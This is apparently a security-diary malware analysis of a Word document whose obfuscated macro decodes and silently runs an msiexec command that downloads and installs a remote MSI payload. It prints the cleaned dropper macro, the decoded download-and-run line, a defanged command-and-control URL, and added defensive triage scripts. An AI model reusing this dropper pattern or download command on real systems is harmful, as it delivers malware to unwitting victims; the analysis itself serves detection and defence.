Antivirus Evasion? Easy as 1,2,3

Published: 2018-05-25
Last Updated: 2018-05-25 07:08:11 UTC
by Xavier Mertens (Version: 1)

For a while, ISC handlers have demonstrated several obfuscation techniques via our diaries. We have always told you that attackers keep looking for new techniques to hide their content so that it is not flagged as malicious by antivirus products. Some of them are quite complex. And sometimes, we find documents that have a very low score on VT. Here is a sample that I found (SHA256: bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810). It gets a score of 6/59[1], which is not bad (from an attacker's perspective). Is it a targeted attack? A new “APT” (buzzword!)? Not really…

The sample got my attention because it was flagged as malicious by only 6 antivirus products, none of them from the top players. When you open it, you see a classic warning message:

The goal is to make the victim execute the VBS macro attached to the document. Just go to the ‘Macro’ menu and open the macro called ‘TYpZVAnvPqNdqkDfBqeG’. The macro is of course obfuscated, but the code is very easy to read: garbage code has simply been added, in the form of never-reached condition blocks and dummy variables:

Dim RSngVushPknGEPaVHjxjeSnJFJQjylGoIAcYFPErxtqoWOecXBdAw As Boolean
If 30 = 33 Then
Dim qEzfeaMeJjeeyyDmBQreGmlbymqeoLxIFsSwdtbos As Byte
Dim MnKMKYQbpWllWqESXgrkhqylVYGgGJIpDm As Date
End If
Dim tybPoOaDypMWiCNeFMjEKWpYqlRkUfNwikwGqIs As Boolean
If 44 = 37 Then
Dim dKdrJZzpEScEvFybWICZCwpjTbQoyFHnxUFugfgzrvNRsbSqjJaxoipgUu As Byte
Dim YhJKrzLoGbzEurbDhHjXqrJZEpeJzOeZamGyqgDOGDUqqfOiWkAixwDgYjG As Date
End If
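
One way to automate that cleanup during triage, as an added example (not the author's tooling and not code from the sample): it drops `If <number> = <number> Then` blocks whose condition can never be true, then drops `Dim` statements for variables that are never referenced. The sample text is constructed, with shortened variable names.

```python
import re

# Constructed sample in the style of the garbage code shown above.
SAMPLE = '''Dim aaa As Boolean
If 30 = 33 Then
Dim bbb As Byte
Dim ccc As Date
End If
Dim var2
If 44 = 37 Then
Dim ddd As Byte
End If
Set var2 = CreateObject("WScript.Shell")
'''

CONST_IF = re.compile(r'^\s*If\s+(\d+)\s*=\s*(\d+)\s+Then\s*$', re.I)
ANY_IF = re.compile(r'^\s*If\b.*\bThen\s*$', re.I)   # multi-line If only
END_IF = re.compile(r'^\s*End\s+If\s*$', re.I)
DIM = re.compile(r'^\s*Dim\s+(\w+)', re.I)

def strip_dead_blocks(source):
    """Remove If blocks comparing two different integer literals."""
    kept, depth = [], 0
    for line in source.splitlines():
        if depth:                      # inside a dead block: track nesting
            if ANY_IF.match(line):
                depth += 1
            elif END_IF.match(line):
                depth -= 1
            continue
        m = CONST_IF.match(line)
        if m and int(m.group(1)) != int(m.group(2)):
            depth = 1                  # condition is constant false
            continue
        kept.append(line)
    return kept

def strip_unused_dims(lines):
    """Remove Dim lines whose variable appears on no other line."""
    out = []
    for i, line in enumerate(lines):
        m = DIM.match(line)
        if m:
            name = re.compile(r'\b%s\b' % re.escape(m.group(1)), re.I)
            if not any(name.search(o) for o in lines[:i] + lines[i + 1:]):
                continue
        out.append(line)
    return out

def clean(source):
    return strip_unused_dims(strip_dead_blocks(source))
```

The output is meant for reading only: it is a line-based filter, not a VBA parser, so keep the original macro text alongside it.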

I beautified the code for easier reading:

Dim string1 As String
Dim string2 As String

' Base64 decode function (MSXML element with the bin.base64 data type)
Function func1(arg1)
    string2 = "Msxml2." & "DOMDocument"
    Dim object1
    Dim var4
    Set object1 = CreateObject(string2)
    string1 = "bin.base64"
    Set var4 = object1.createElement("ipKHiUOXckoBg")
    var4.DataType = string1
    var4.Text = arg1
    func1 = var4.NodeTypedValue
End Function

Sub main()
    On Error Resume Next
    i = 0    ' window style 0: the command runs in a hidden window
    var1 = "WSCript.shell"
    Dim var2
    Set var2 = CreateObject(var1)
    ' Decode the Base64 command line (truncated here) and run it
    var3 = func1("bQBzAGkAZQB4AGUAYwAuAGUAeABlACAALwBpACAAaAB0AHQAcAA6AC [...] gAC8AcQB1AGkAZQB0AA==")
    var2.Run var3, i
End Sub

The function ‘func1’ is just a Base64 decoder and the Base64 string is decoded to:

msiexec.exe /i hxxp://nunovidente[.]pt/_output6fd4680.msi /quiet

You can see that, like most Microsoft tools, msiexec.exe accepts a URL as a filename and automatically downloads the file before the installation. From the msiexec.exe syntax help:

</package | /i> <Product.msi> : Installs or configures a product
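
A triage check built on the two observations above (the command is a Base64 string literal holding UTF-16LE text, and msiexec.exe is handed a URL), as an added example that is not part of the original diary: it pulls long Base64 literals out of macro source, decodes them, and reports any msiexec command line that installs from a remote URL. The sample command and its host name are constructed placeholders.

```python
import base64
import binascii
import re

# Constructed input: a command of the same shape as the decoded one above,
# with a placeholder host, stored the way the macro stores it
# (UTF-16LE text, then Base64).
SAMPLE_CMD = "msiexec.exe /i http://payload.example.invalid/pkg.msi /quiet"
SAMPLE_MACRO = 'var3 = func1("%s")\nvar1 = "WSCript.shell"\n' % (
    base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode("ascii"))

B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{24,}={0,2})"')
REMOTE_MSI = re.compile(
    r'\bmsiexec(?:\.exe)?\b.*?(?:/i|/package)\s+"?(https?://[^\s"]+)', re.I)

def decode_literal(b64):
    """Return the decoded text, or None if the literal is not Base64 text."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    # ASCII text stored as UTF-16LE has a zero in every second byte.
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None

def find_remote_msi(macro_source):
    """Return (decoded command, URL) pairs for msiexec installs from a URL."""
    hits = []
    for m in B64_LITERAL.finditer(macro_source):
        text = decode_literal(m.group(1))
        if text:
            url = REMOTE_MSI.search(text)
            if url:
                hits.append((text, url.group(1)))
    return hits
```

A macro that builds the Base64 string from several concatenated literals needs those joined before this check will see it.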

Since I found the document, the payload has been removed. It was not available on VT (SHA256: 51b53eaa4fe6790b60bd2a88b934baa3de841462513904f9c8bd048414f6eece). The MSI file installs a malicious binary (SHA256: aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455)[2] which communicates with hxxp://mountaintopbuilders[.]com/wp-admin/user/five/fre.php. Hopefully, this one has a better detection score.

This demonstrates that running a classic antivirus is mandatory but remains a weak protection: it can be easily evaded with simple obfuscation. If you’re interested in MSI file analysis, Didier wrote a diary on this topic[3].

[1] https://www.virustotal.com/#/file/bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810/detection
[2] https://www.virustotal.com/#/file/aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455/detection
[3] https://isc.sans.edu/forums/diary/Analyzing+MSI+files/23355

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant